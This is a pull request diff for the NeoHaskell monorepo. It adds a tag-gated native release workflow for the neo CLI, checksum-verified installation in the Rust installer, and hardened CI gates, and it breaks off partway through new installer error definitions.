### PR TITLE
feat(release): add native Neo release and verified installer path

### DIFF
--- a/.github/workflows/installer-ci.yml
+++ b/.github/workflows/installer-ci.yml
@@ -1,41 +1,89 @@
-# Installer CI — adapted for monorepo. Release tags use 'installer-v*' prefix
-# (e.g., installer-v0.1.0) to avoid conflicts with core library tags.
+# Installer CI — the Rust `installer/` crate (`neo-install`) in the monorepo.
 #
-# NOTE: GitHub Actions path filters do NOT apply to tag-based triggers, so the
-# 'installer-v*' tag prefix is the sole disambiguation for installer releases.
+# Release tags use the 'installer-v*' prefix (e.g. installer-v0.1.0), independent
+# of the Haskell library tags and the neo CLI's 'neo-v*' tags. GitHub Actions
+# path filters do NOT apply to tag triggers, so that prefix is the sole
+# disambiguation for an installer release.
 #
-# Scope: lint, unit tests, and cross-target release builds only. This repository
-# does not maintain a fresh-install workflow: installing Nix mutates the runner
-# and takes roughly 30 minutes. Release-specific fresh-install validation remains
-# an explicit maintainer decision outside automated CI.
+# Base-branch policy (deliberate, mirrors neo-ci.yml): there is NO `branches:`
+# allowlist on the pull_request trigger. The installer ships through official
+# stacked PRs whose base is whatever lower stack layer they sit on, so an
+# allowlist would silently stop gating the installer the moment it stacks on a
+# new branch. Diff-scoping is done PER-PR by the `changes` job. The required
+# check is the always()-running `installer-ci-gate` aggregate, so a skipped
+# component job never leaves a required check pending in branch protection.
+#
+# Scope: lint, unit/consistency tests, and cross-target release builds. There is
+# no fresh-install workflow (installing Nix mutates the runner and takes ~30m);
+# release-specific fresh-install validation is a maintainer decision outside CI.
 name: Installer CI
 
 on:
   push:
     branches: [main]
-    tags: ['installer-v*']
-    paths:
-      - 'installer/**'
+    tags: ["installer-v*"]
   pull_request:
-    # Neo CLI monorepo migration (bootstrap): installer PRs targeting the
-    # staging integration branch get the same required installer CI as PRs to
-    # main. main behavior is unchanged — this only ADDS the integration base.
-    branches: [main, integration/neo-monorepo]
-    paths:
-      - 'installer/**'
+    types: [opened, synchronize, reopened, ready_for_review]
+
+permissions:
+  contents: read
+
+concurrency:
+  group: installer-ci-${{ github.workflow }}-${{ github.ref }}
+  cancel-in-progress: true
 
 env:
   CARGO_TERM_COLOR: always
 
 jobs:
+  # Per-PR diff scoping. On push/tag the trigger already implies relevance
+  # (touched=true). On a PR we diff against the actual base ref, whatever it is
+  # named, so stacked layers work unchanged.
+  changes:
+    runs-on: ubuntu-latest
+    timeout-minutes: 5
+    outputs:
+      touched: ${{ steps.detect.outputs.touched }}
+    steps:
+      - uses: actions/checkout@v7.0.1
+        with:
+          fetch-depth: 0
+          persist-credentials: false
+      - id: detect
+        env:
+          EVENT: ${{ github.event_name }}
+          BASE_REF: ${{ github.base_ref }}
+        run: |
+          set -euo pipefail
+          if [ "$EVENT" != "pull_request" ]; then
+            echo "touched=true" >> "$GITHUB_OUTPUT"
+            exit 0
+          fi
+          CHANGED="$(git diff --name-only "origin/${BASE_REF}...HEAD")"
+          # The installer crate PLUS its release workflow (a workflow change can
+          # break the release/asset contract the bootstrap + install path rely on).
+          PATTERN='^(installer/|\.github/workflows/installer-ci\.yml)'
+          if echo "$CHANGED" | grep -qE "$PATTERN"; then
+            echo "touched=true" >> "$GITHUB_OUTPUT"
+          else
+            echo "touched=false" >> "$GITHUB_OUTPUT"
+          fi
+
   lint:
+    needs: changes
+    if: >-
+      (github.event_name != 'pull_request' || github.event.pull_request.draft == false)
+      && needs.changes.outputs.touched == 'true'
     name: Lint
     runs-on: ubuntu-latest
+    timeout-minutes: 20
     defaults:
       run:
         working-directory: installer
     steps:
       - uses: actions/checkout@v7.0.1
+        with:
+          persist-credentials: false
       - uses: dtolnay/rust-toolchain@stable
         with:
           components: rustfmt, clippy
@@ -43,16 +91,23 @@ jobs:
         with:
           workspaces: installer
       - run: cargo fmt --check
-      - run: cargo clippy -- -D warnings
+      - run: cargo clippy --all-targets --all-features -- -D warnings
 
   test:
+    needs: changes
+    if: >-
+      (github.event_name != 'pull_request' || github.event.pull_request.draft == false)
+      && needs.changes.outputs.touched == 'true'
     name: Test
     runs-on: ubuntu-latest
+    timeout-minutes: 20
     defaults:
       run:
         working-directory: installer
     steps:
       - uses: actions/checkout@v7.0.1
+        with:
+          persist-credentials: false
       - uses: dtolnay/rust-toolchain@stable
       - uses: Swatinem/rust-cache@v2
         with:
@@ -60,12 +115,18 @@ jobs:
       - run: cargo test --locked --all-features
 
   build:
+    needs: changes
+    if: >-
+      (github.event_name != 'pull_request' || github.event.pull_request.draft == false)
+      && needs.changes.outputs.touched == 'true'
     name: Build (${{ matrix.target }})
     runs-on: ${{ matrix.runner }}
+    timeout-minutes: 45
     defaults:
       run:
         working-directory: installer
     strategy:
+      fail-fast: false
       matrix:
         include:
           - target: x86_64-unknown-linux-gnu
@@ -82,6 +143,8 @@ jobs:
             cross: false
     steps:
       - uses: actions/checkout@v7.0.1
+        with:
+          persist-credentials: false
       - uses: dtolnay/rust-toolchain@stable
         with:
           targets: ${{ matrix.target }}
@@ -96,39 +159,93 @@ jobs:
           tool: cross
       - name: Build (cross)
         if: matrix.cross
-        run: cross build --release --target ${{ matrix.target }}
+        run: cross build --release --locked --target ${{ matrix.target }}
       - name: Build (native)
         if: '!matrix.cross'
-        run: cargo build --release --target ${{ matrix.target }}
-      - name: Package
+        run: cargo build --release --locked --target ${{ matrix.target }}
+      - name: Package the native asset
+        env:
+          TARGET: ${{ matrix.target }}
         run: |
+          set -euo pipefail
           mkdir -p artifacts
-          cp target/${{ matrix.target }}/release/neo-install artifacts/installer-neo-install-${{ matrix.target }}
+          cp "target/${TARGET}/release/neo-install" "artifacts/installer-neo-install-${TARGET}"
       - uses: actions/upload-artifact@v7
         with:
           name: installer-neo-install-${{ matrix.target }}
-          path: installer/artifacts/installer-neo-install-${{ matrix.target }}
+          path: |
+            installer/artifacts/installer-neo-install-${{ matrix.target }}
+          if-no-files-found: error
 
+  # Publish ONLY from an 'installer-v*' tag, and ONLY after lint+test+build pass.
   release:
-    name: Release
     needs: [lint, test, build]
     if: startsWith(github.ref, 'refs/tags/installer-v')
+    name: Release
     runs-on: ubuntu-latest
+    timeout-minutes: 30
     permissions:
       contents: write
     steps:
       - uses: actions/checkout@v7.0.1
+        with:
+          persist-credentials: false
       - uses: actions/download-artifact@v8
         with:
           path: artifacts
           merge-multiple: true
-      - name: Generate checksums
+      # ONE checksum-manifest convention across both release trains: the bare name
+      # SHA256SUMS (no `.txt`), matching the neo train (scripts/neo-release) and
+      # the installer's own native-download path (installer/src/release.rs).
+      - name: Generate aggregate checksums
         run: |
           cd artifacts
-          sha256sum installer-neo-install-* > SHA256SUMS.txt
+          sha256sum installer-neo-install-* > SHA256SUMS
       - uses: softprops/action-gh-release@v3
         with:
           files: |
             artifacts/installer-neo-install-*
-            artifacts/SHA256SUMS.txt
+            artifacts/SHA256SUMS
           generate_release_notes: true
+
+  # THE REQUIRED CHECK for the installer component. `if: always()` + no
+  # workflow-level paths filter => it always reports a conclusion, so it is safe
+  # to require in branch protection (unlike the diff-scoped component jobs).
+  # Skips are accepted only when there is genuinely nothing to test: a draft PR,
+  # or a PR that changed no installer surface.
+  installer-ci-gate:
+    if: always()
+    needs: [changes, lint, test, build]
+    runs-on: ubuntu-latest
+    timeout-minutes: 5
+    steps:
+      - name: Check all installer jobs passed (or correctly skipped)
+        env:
+          IS_DRAFT: ${{ github.event_name == 'pull_request' && github.event.pull_request.draft }}
+          TOUCHED: ${{ needs.changes.outputs.touched }}
+          CHANGES_RESULT: ${{ needs.changes.result }}
+        run: |
+          if [[ "$CHANGES_RESULT" != "success" ]]; then
+            echo "::error::changes-detection job did not succeed ($CHANGES_RESULT)"
+            exit 1
+          fi
+          allow_skip=false
+          if [[ "$IS_DRAFT" == "true" || "$TOUCHED" != "true" ]]; then
+            allow_skip=true
+          fi
+          results=(
+            "lint=${{ needs.lint.result }}"
+            "test=${{ needs.test.result }}"
+            "build=${{ needs.build.result }}"
+          )
+          for entry in "${results[@]}"; do
+            job="${entry%%=*}"; r="${entry#*=}"
+            if [[ "$r" == "skipped" && "$allow_skip" == "true" ]]; then
+              continue
+            fi
+            if [[ "$r" != "success" ]]; then
+              echo "::error::$job did not pass (result: $r)"
+              exit 1
+            fi
+          done
+          echo "installer-ci-gate: all installer jobs passed (or correctly skipped)"

--- a/.github/workflows/neo-ci.yml
+++ b/.github/workflows/neo-ci.yml
@@ -196,15 +196,28 @@ jobs:
       - name: Smoke the flake app
         run: nix run .#neo -- --version
 
-  # The generated-project consumer contract (Linux). One blocking end-to-end
-  # proof that the Nix-packaged `neo` generates a project from the embedded
-  # starter offline and that the generated project builds, tests, runs, and
-  # answers GET /health against THIS monorepo checkout (neohaskell overridden to
-  # path:<checkout>), rather than mutable upstream `main`. It orchestrates the
-  # installed binary + a real generated project; it does not duplicate the Rust
-  # unit tests. It runs on the broader `contract` surface (also core/,
-  # integrations/) because a change there can break the starter->upstream
-  # contract. Blocking (never continue-on-error): a failure here is the signal.
+  # The generated-project consumer contract (Linux) — ALSO the release rehearsal.
+  # One blocking end-to-end proof that the RELEASE-PACKAGED, checksum-VERIFIED,
+  # PORTABLE native `neo` binary (the exact artifact a user downloads) generates a
+  # project from the embedded starter offline and that the generated project
+  # builds, tests, runs, and answers GET /health against THIS monorepo checkout
+  # (neohaskell overridden to path:<checkout>), rather than mutable upstream
+  # `main`. It builds the binary the SAME portable way the release does (pinned
+  # cargo, NOT nix build — a nix binary hard-codes /nix/store libs), runs the
+  # portability gate, then packages + checksum-verifies + atomically installs via
+  # the shared scripts/neo-release contract and feeds that installed binary to the
+  # contract via NEO_BIN. So the release path and the consumer path are proven
+  # together. Runs on the broader `contract` surface (also core/, integrations/)
+  # because a change there can break the starter->upstream contract. At minimum
+  # Linux x86_64 is the blocking consumer rehearsal (clean-machine/SLO proof is a
+  # separate concern, not claimed here; per-target native install+smoke lives in
+  # neo-release.yml). Blocking (never continue-on-error): a failure here is the
+  # signal.
+  #
+  # This job holds NO secret and is reachable by PR-controlled code, so it must
+  # never touch Cachix write. READ acceleration is automatic via the flake's
+  # nixConfig substituter; WRITE happens only in the isolated, main-only
+  # `cache-populate` job below.
   consumer-contract:
     needs: changes
     if: >-
@@ -212,12 +225,22 @@ jobs:
       && needs.changes.outputs.contract == 'true'
     runs-on: ubuntu-latest
     timeout-minutes: 150
+    env:
+      REHEARSAL_TARGET: x86_64-unknown-linux-gnu
     steps:
       # The contract creates a local Git input at the exact checkout revision.
       # Nix rejects git+file inputs cloned from shallow repositories.
       - uses: actions/checkout@v7.0.0
         with:
           fetch-depth: 0
+      # Pinned, reproducible toolchain (matches the neo dev shell) — a cargo build
+      # links system C libs, so the artifact is portable, exactly like the release.
+      - uses: dtolnay/rust-toolchain@1.94.0
+        with:
+          targets: x86_64-unknown-linux-gnu
+      - uses: Swatinem/rust-cache@v2
+        with:
+          workspaces: neo
       - uses: DeterminateSystems/determinate-nix-action@v3.21.7
         with:
           extra-conf: |
@@ -225,7 +248,19 @@ jobs:
       - uses: DeterminateSystems/magic-nix-cache-action@v14
       - name: Self-test the contract orchestration logic (timeout, cleanup, quoting, readiness)
         run: ./dev neo-consumer-contract --self-test
-      - name: Run the generated-project consumer contract
+      # Build the PORTABLE binary the same way the release does, gate portability,
+      # then package + checksum-verify + atomically install it — so the rehearsal
+      # exercises the real download-and-verify install contract on the real artifact.
+      - name: Build portable binary, gate portability, verify + install
+        run: |
+          set -euo pipefail
+          cargo build --release --locked --manifest-path neo/Cargo.toml --target "$REHEARSAL_TARGET"
+          ./scripts/neo-release inspect "neo/target/${REHEARSAL_TARGET}/release/neo" "$REHEARSAL_TARGET"
+          ./scripts/neo-release package "$REHEARSAL_TARGET" "neo/target/${REHEARSAL_TARGET}/release/neo" "$RUNNER_TEMP/neo-artifacts"
+          ./scripts/neo-release checksums "$RUNNER_TEMP/neo-artifacts"
+          ./scripts/neo-release install "$RUNNER_TEMP/neo-artifacts" "$REHEARSAL_TARGET" "$RUNNER_TEMP/neo-bin/neo"
+          echo "NEO_BIN=$RUNNER_TEMP/neo-bin/neo" >> "$GITHUB_ENV"
+      - name: Run the generated-project consumer contract against the installed artifact
         env:
           # Keep each heavy phase inside the job wall-clock so the contract's own
           # bounded timeout + clean teardown fire before GitHub kills the job.
@@ -233,6 +268,73 @@ jobs:
           CONTRACT_TEST_TIMEOUT: "2400"
           CONTRACT_READY_DEADLINE: "300"
         run: ./dev neo-consumer-contract
+
+  # Trusted cache population — ISOLATED from any PR-controlled code. Runs ONLY on
+  # a push to main of THIS repository, so the CACHIX_AUTH_TOKEN it holds is never
+  # exposed to a job that checks out or executes a pull request's code. It runs
+  # the EXACT consumer path (the same ./dev neo-consumer-contract) so the cache is
+  # populated from real contract execution, then Cachix pushes what that built.
+  # A missing token skips honestly (job succeeds, nothing pushed, no pretense).
+  # NOT part of the required gate: it is a best-effort warmer, never a merge
+  # blocker, and the cache only ACCELERATES — it never replaces execution.
+  cache-populate:
+    needs: changes
+    if: >-
+      github.event_name == 'push'
+      && github.ref == 'refs/heads/main'
+      && github.repository == 'neohaskell/NeoHaskell'
+      && needs.changes.outputs.contract == 'true'
+    runs-on: ubuntu-latest
+    timeout-minutes: 150
+    env:
+      CACHIX_AUTH_TOKEN: ${{ secrets.CACHIX_AUTH_TOKEN }}
+      REHEARSAL_TARGET: x86_64-unknown-linux-gnu
+    steps:
+      - name: Honest skip when no token is configured
+        if: ${{ env.CACHIX_AUTH_TOKEN == '' }}
+        run: echo "No CACHIX_AUTH_TOKEN configured — skipping cache population (not a failure)."
+      - uses: actions/checkout@v7.0.0
+        if: ${{ env.CACHIX_AUTH_TOKEN != '' }}
+        with:
+          fetch-depth: 0
+      - uses: dtolnay/rust-toolchain@1.94.0
+        if: ${{ env.CACHIX_AUTH_TOKEN != '' }}
+        with:
+          targets: x86_64-unknown-linux-gnu
+      - uses: Swatinem/rust-cache@v2
+        if: ${{ env.CACHIX_AUTH_TOKEN != '' }}
+        with:
+          workspaces: neo
+      - uses: DeterminateSystems/determinate-nix-action@v3.21.7
+        if: ${{ env.CACHIX_AUTH_TOKEN != '' }}
+        with:
+          extra-conf: |
+            accept-flake-config = true
+      - uses: DeterminateSystems/magic-nix-cache-action@v14
+        if: ${{ env.CACHIX_AUTH_TOKEN != '' }}
+      # Cachix push is set up only now — after the trust guard (main-only + token
+      # present) — so the token is never present alongside PR-controlled code. Its
+      # post-job hook pushes the store paths the consumer path builds below.
+      - name: Configure Cachix push
+        if: ${{ env.CACHIX_AUTH_TOKEN != '' }}
+        uses: cachix/cachix-action@v17
+        with:
+          name: neohaskell
+          authToken: ${{ secrets.CACHIX_AUTH_TOKEN }}
+      - name: Populate the cache from the EXACT consumer path
+        if: ${{ env.CACHIX_AUTH_TOKEN != '' }}
+        env:
+          CONTRACT_BUILD_TIMEOUT: "5400"
+          CONTRACT_TEST_TIMEOUT: "2400"
+          CONTRACT_READY_DEADLINE: "300"
+        run: |
+          set -euo pipefail
+          cargo build --release --locked --manifest-path neo/Cargo.toml --target "$REHEARSAL_TARGET"
+          ./scripts/neo-release inspect "neo/target/${REHEARSAL_TARGET}/release/neo" "$REHEARSAL_TARGET"
+          ./scripts/neo-release package "$REHEARSAL_TARGET" "neo/target/${REHEARSAL_TARGET}/release/neo" "$RUNNER_TEMP/neo-artifacts"
+          ./scripts/neo-release checksums "$RUNNER_TEMP/neo-artifacts"
+          ./scripts/neo-release install "$RUNNER_TEMP/neo-artifacts" "$REHEARSAL_TARGET" "$RUNNER_TEMP/neo-bin/neo"
+          NEO_BIN="$RUNNER_TEMP/neo-bin/neo" ./dev neo-consumer-contract
 
   # THE REQUIRED CHECK for the neo component. `if: always()` + no workflow-level
   # paths filter => it always reports a conclusion on every PR, so it is safe to

--- a/.github/workflows/neo-release.yml
+++ b/.github/workflows/neo-release.yml
@@ -1,0 +1,132 @@
+# Neo CLI release — publishes native `neo` binaries for the installer to download.
+#
+# Trigger is TAG-ONLY for publication: a `neo-v*` tag (independent of the Haskell
+# library tags and the `installer-v*` tags — neo has its own release train). A
+# maintainer `workflow_dispatch` can REHEARSE the build matrix, but it can never
+# publish: the `publish` job is gated on `refs/tags/neo-v*`, so any non-tag run
+# builds and checksums artifacts and then stops (fail closed).
+#
+# GitHub Actions path filters do NOT apply to tag triggers, so the `neo-v*` tag
+# prefix is the sole disambiguation for a Neo release.
+#
+# Each target is built NATIVELY on a matching runner with a PINNED cargo/rustup
+# toolchain (NOT `nix build .#neo`, whose output hard-codes /nix/store library
+# paths and is therefore NOT runnable on a user's machine). A rustup cargo build
+# links the system C libraries, producing a genuinely portable native binary; a
+# blocking portability gate (`scripts/neo-release inspect`) refuses any binary
+# that still references the Nix store. Each asset is then installed + smoked on
+# its own native runner before publication. The sealed in-crate unit tests are
+# preserved SEPARATELY off the release path (neo-ci.yml `nix-package` job runs
+# `nix build .#neo`, whose checkPhase runs them). The asset-naming + checksum
+# contract is owned by `scripts/neo-release` (the same script the neo-ci rehearsal
+# uses), so published names can never drift from what the installer downloads
+# (installer/src/release.rs).
+name: Neo Release
+
+on:
+  push:
+    tags: ["neo-v*"]
+  workflow_dispatch: {} # maintainer build rehearsal only — publish stays tag-gated
+
+# Read-only by default. Only the tag-gated publish job elevates to contents:write.
+permissions:
+  contents: read
+
+concurrency:
+  group: neo-release-${{ github.ref }}
+  cancel-in-progress: false
+
+jobs:
+  build:
+    name: Build ${{ matrix.target }}
+    strategy:
+      fail-fast: false
+      matrix:
+        include:
+          - target: x86_64-unknown-linux-gnu
+            runner: ubuntu-latest
+          - target: aarch64-unknown-linux-gnu
+            runner: ubuntu-24.04-arm
+          - target: x86_64-apple-darwin
+            runner: macos-15-intel
+          - target: aarch64-apple-darwin
+            runner: macos-latest
+    runs-on: ${{ matrix.runner }}
+    timeout-minutes: 90
+    steps:
+      - uses: actions/checkout@v7.0.1
+        with:
+          persist-credentials: false
+      # Pinned, reproducible toolchain (matches the neo dev shell's Rust). A
+      # rustup cargo build links the SYSTEM C libraries → portable native binary.
+      - uses: dtolnay/rust-toolchain@1.94.0
+        with:
+          targets: ${{ matrix.target }}
+      - uses: Swatinem/rust-cache@v2
+        with:
+          workspaces: neo
+          key: ${{ matrix.target }}
+      # The committed IDE bundle (assets/ide/dist) is embedded via rust-embed, so
+      # no frontend build is needed here; neo-dist-check (neo-ci.yml) proves it a
+      # faithful rebuild. The sealed unit tests run separately (nix-package job).
+      - name: Build the portable native binary
+        env:
+          TARGET: ${{ matrix.target }}
+        run: cargo build --release --locked --manifest-path neo/Cargo.toml --target "$TARGET"
+      # Blocking portability gate: refuse a binary that references the Nix store.
+      - name: Portability gate (no /nix/store references)
+        env:
+          TARGET: ${{ matrix.target }}
+        run: ./scripts/neo-release inspect "neo/target/${TARGET}/release/neo" "$TARGET"
+      # Package + checksum through the shared naming contract (scripts/neo-release).
+      - name: Package + checksum the native asset
+        env:
+          TARGET: ${{ matrix.target }}
+        run: |
+          ./scripts/neo-release package "$TARGET" "neo/target/${TARGET}/release/neo" artifacts
+          ./scripts/neo-release checksums artifacts
+      # Native install + smoke on THIS target's native runner: prove the exact
+      # published, checksum-verified asset installs and runs before publication.
+      - name: Native install + smoke
+        env:
+          TARGET: ${{ matrix.target }}
+        run: |
+          ./scripts/neo-release install artifacts "$TARGET" "$RUNNER_TEMP/neo-smoke/neo"
+          "$RUNNER_TEMP/neo-smoke/neo" --version
+      - uses: actions/upload-artifact@v7
+        with:
+          name: neo-${{ matrix.target }}
+          path: |
+            artifacts/neo-${{ matrix.target }}
+          if-no-files-found: error
+
+  # Publish ONLY from a `neo-v*` tag, and ONLY after every build/test gate passed.
+  # A workflow_dispatch rehearsal reaches this job but the ref guard skips it, so
+  # nothing is ever published off a non-tag run.
+  publish:
+    name: Publish release
+    needs: [build]
+    if: startsWith(github.ref, 'refs/tags/neo-v')
+    runs-on: ubuntu-latest
+    timeout-minutes: 30
+    permissions:
+      contents: write
+    steps:
+      - uses: actions/checkout@v7.0.1
+        with:
+          persist-credentials: false
+      - uses: actions/download-artifact@v8
+        with:
+          path: artifacts
+          merge-multiple: true
+      # Regenerate the aggregate SHA256SUMS over ALL published assets via the
+      # same contract the installer verifies against.
+      - name: Aggregate checksums
+        run: ./scripts/neo-release checksums artifacts
+      - name: Publish assets + checksums to the tag release
+        uses: softprops/action-gh-release@v3
+        with:
+          files: |
+            artifacts/neo-*
+            artifacts/SHA256SUMS
+          generate_release_notes: true

--- a/dev
+++ b/dev
@@ -76,6 +76,10 @@ usage: ./dev <verb> [args]
                           from the embedded starter offline, then build/test/run it
                           against THIS checkout (neohaskell -> path:<checkout>) and
                           poll /health (--self-test for the orchestration logic)
+  neo-release <cmd>     native `neo` release-asset contract (single source of
+                          truth for naming/checksums shared by the release
+                          workflow + rehearsal): targets, asset-name, package,
+                          checksums, verify, install, --self-test
   doctor                harness self-check: every script has a verb or a
                           reasoned exemption; no dangling verbs (CI-enforced)
   exec <cmd> [args]     run any command with the pinned toolchain
@@ -118,6 +122,7 @@ case "${VERB}" in
   neo-skills-check) exec scripts/neo-skills-check "$@" ;;
   neo-dist-check) exec scripts/neo-dist-check "$@" ;;
   neo-consumer-contract) exec scripts/neo-consumer-contract "$@" ;;
+  neo-release) exec scripts/neo-release "$@" ;;
   doctor)   exec scripts/doctor "$@" ;;
   exec)     exec scripts/with-toolchain "$@" ;;
   ""|help|-h|--help) usage ;;

--- a/installer/Cargo.lock
+++ b/installer/Cargo.lock
@@ -95,6 +95,15 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "843867be96c8daad0d758b57df9392b6d8d271134fce549de6ce169ff98a92af"
 
 [[package]]
+name = "block-buffer"
+version = "0.10.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3078c7629b62d3f0439517fa394996acacc5cbc91c5a20d8c658e77abd503a71"
+dependencies = [
+ "generic-array",
+]
+
+[[package]]
 name = "bstr"
 version = "1.12.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -177,10 +186,39 @@ dependencies = [
 ]
 
 [[package]]
+name = "cpufeatures"
+version = "0.2.17"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "59ed5838eebb26a2bb2e58f6d5b5316989ae9d08bab10e0e6d103e656d1b0280"
+dependencies = [
+ "libc",
+]
+
+[[package]]
+name = "crypto-common"
+version = "0.1.7"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "78c8292055d1c1df0cce5d180393dc8cce0abec0a7102adb6c7b1eef6016d60a"
+dependencies = [
+ "generic-array",
+ "typenum",
+]
+
+[[package]]
 name = "difflib"
 version = "0.4.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "6184e33543162437515c2e2b48714794e37845ec9851711914eec9d308f6ebe8"
+
+[[package]]
+name = "digest"
+version = "0.10.7"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9ed9a281f7bc9b7576e61468ba615a66a5c8cfdff42420a70aa82701a3b1e292"
+dependencies = [
+ "block-buffer",
+ "crypto-common",
+]
 
 [[package]]
 name = "either"
@@ -236,6 +274,16 @@ name = "foldhash"
 version = "0.1.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "d9c4f5dac5e15c24eb999c26181a6ca40b39fe946cbe4c263c7209467bc83af2"
+
+[[package]]
+name = "generic-array"
+version = "0.14.7"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "85649ca51fd72272d7821adaf274ad91c288277713d9c18820d8499a7ff69e9a"
+dependencies = [
+ "typenum",
+ "version_check",
+]
 
 [[package]]
 name = "getrandom"
@@ -366,6 +414,7 @@ dependencies = [
  "predicates",
  "serde",
  "serde_json",
+ "sha2",
  "tempfile",
  "thiserror",
  "which",
@@ -572,6 +621,17 @@ dependencies = [
 ]
 
 [[package]]
+name = "sha2"
+version = "0.10.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a7507d819769d01a365ab707794a4084392c824f54a7a6a7862f8c3d0892b283"
+dependencies = [
+ "cfg-if",
+ "cpufeatures",
+ "digest",
+]
+
+[[package]]
 name = "strsim"
 version = "0.11.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -628,6 +688,12 @@ dependencies = [
 ]
 
 [[package]]
+name = "typenum"
+version = "1.20.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b6f5e870be6c3b371b77fe0ee0bafb859fa4964b4404c27de1d380043c4dda20"
+
+[[package]]
 name = "unicode-ident"
 version = "1.0.24"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -650,6 +716,12 @@ name = "utf8parse"
 version = "0.2.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "06abde3611657adf66d383f00b093d7faecc7fa57071cce2578660c9f1010821"
+
+[[package]]
+name = "version_check"
+version = "0.9.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0b928f33d975fc6ad9f86c8f283853ad26bdd5b10b7f1542aa2fa15e2289105a"
 
 [[package]]
 name = "wait-timeout"

--- a/installer/Cargo.toml
+++ b/installer/Cargo.toml
@@ -17,6 +17,7 @@ which = "7"
 tempfile = "3"
 serde = { version = "1", features = ["derive"] }
 serde_json = "1"
+sha2 = "0.10"
 
 [dev-dependencies]
 assert_cmd = "2"

--- a/installer/README.md
+++ b/installer/README.md
@@ -34,15 +34,49 @@ chmod +x neo-install-*
 | `--help` | Show help information |
 | `--version` | Show version |
 
+| Environment variable | Description |
+|----------------------|-------------|
+| `NEO_VERSION` | Pin a specific Neo CLI release, e.g. `NEO_VERSION=neo-v0.1.0`. Unset resolves the newest `neo-v*` release. Validated to a `neo-v*` tag. |
+| `NEO_BIN_DIR` | Absolute directory the native `neo` binary is installed into. Defaults to `$HOME/.local/bin`. Validated as an absolute, control-character-free path (rejected otherwise) and single-quoted when written to your shell profile. |
+
 ## How It Works
 
 The installer performs three steps:
 
-1. **Toolchain Setup** — Installs the required build toolchain if not already present
-2. **Neo CLI** — Installs the Neo command-line interface
-3. **Verification** — Confirms everything is working correctly
+1. **Toolchain Setup** — Installs the required build toolchain (Nix) if not
+   already present. Generated NeoHaskell projects require Nix, so this stays a
+   declarative Nix path (`neo build`/`neo run` use the project's own flake).
+2. **Neo CLI** — Downloads the **prebuilt native `neo` binary** for your platform
+   from the [NeoHaskell releases](https://github.com/neohaskell/NeoHaskell/releases),
+   verifies it against the release's `SHA256SUMS` **before** installing, and
+   installs it atomically to a user-writable bin directory. It does **not**
+   evaluate or compile the Neo CLI from a flake — normal users get a fast, native
+   download with a checksum guarantee.
+3. **Verification** — Confirms everything is working correctly.
 
 After installation, run `neo new myproject` to create your first project.
+
+### Release contract (why the tag prefixes)
+
+Three independent release trains publish to the one `neohaskell/NeoHaskell`
+monorepo, disambiguated only by tag prefix (GitHub tag triggers ignore path
+filters):
+
+- **`installer-v*`** — this installer's own native binaries
+  (`installer-neo-install-<target>`), published by
+  [`installer-ci.yml`](../.github/workflows/installer-ci.yml). The
+  `curl | sh` bootstrap downloads these.
+- **`neo-v*`** — the native `neo` CLI binaries (`neo-<target>`), published by
+  [`neo-release.yml`](../.github/workflows/neo-release.yml). This installer
+  downloads these at step 2.
+- The NeoHaskell library tags — unrelated to either binary.
+
+Because assets live **only** under their own tag prefix, neither the bootstrap
+nor the installer uses the repository-wide `releases/latest` redirect (it would
+resolve some *other* train's newest release and 404). Both resolve the newest
+tag of their **own** prefix explicitly. The asset-naming, target list, repository,
+and tag prefixes are frozen against drift by the tests in
+[`tests/consistency.rs`](tests/consistency.rs) and by `./dev workflow-check`.
 
 ## Supported Platforms
 
@@ -80,11 +114,12 @@ cargo fmt --check
 
 ### Architecture
 
-The installer is built in Rust and uses the [Determinate Nix Installer](https://github.com/DeterminateSystems/nix-installer) under the hood to set up the Nix package manager, then installs Neo CLI via `nix profile install`.
+The installer is built in Rust and uses the [Determinate Nix Installer](https://github.com/DeterminateSystems/nix-installer) under the hood to set up the Nix package manager, then downloads and installs the prebuilt native `neo` binary (verified against `SHA256SUMS`).
 
 Source modules:
 - `detect.rs` — Platform and existing installation detection
-- `install.rs` — Nix and Neo CLI installation logic
+- `install.rs` — Nix installation + shell PATH setup (delegates Neo to `release`)
+- `release.rs` — Native Neo release resolution, download, checksum verification, atomic install
 - `verify.rs` — Post-install verification
 - `ui.rs` — Terminal output and progress indicators
 - `error.rs` — Error types and exit codes

--- a/installer/src/error.rs
+++ b/installer/src/error.rs
@@ -8,6 +8,40 @@ pub enum InstallerError {
     #[error("Failed to install Neo CLI: {details}\nReport issues: https://github.com/neohaskell/NeoHaskell/issues")]
     NeoInstallFailed { details: String },
 
+    #[error(
+        "Invalid NEO_VERSION '{value}': {details}.\nSet NEO_VERSION to a Neo release tag like neo-v0.1.0, or unset it to install the newest neo-v* release.\nReleases: https://github.com/neohaskell/NeoHaskell/releases"
+    )]
+    InvalidNeoVersion { value: String, details: String },
+
+    #[error(
+        "Invalid NEO_BIN_DIR '{value}': {details}.\nSet NEO_BIN_DIR to an absolute directory path (e.g. /home/you/.local/bin), or unset it to use the default $HOME/.local/bin."
+    )]
+    InvalidBinDir { value: String, details: String },
+
+    #[error(
+        "Could not determine which Neo CLI release to install: {details}.\nReleases: https://github.com/neohaskell/NeoHaskell/releases"
+    )]
+    NeoReleaseResolutionFailed { details: String },
+
+    #[error(
+        "Failed to download {url}: {details}.\nCheck your network, then retry. If a specific version is missing, pick another with NEO_VERSION=neo-vX.Y.Z.\nReleases: https://github.com/neohaskell/NeoHaskell/releases"
+    )]
+    NeoDownloadFailed { url: String, details: String },
+
+    #[error(
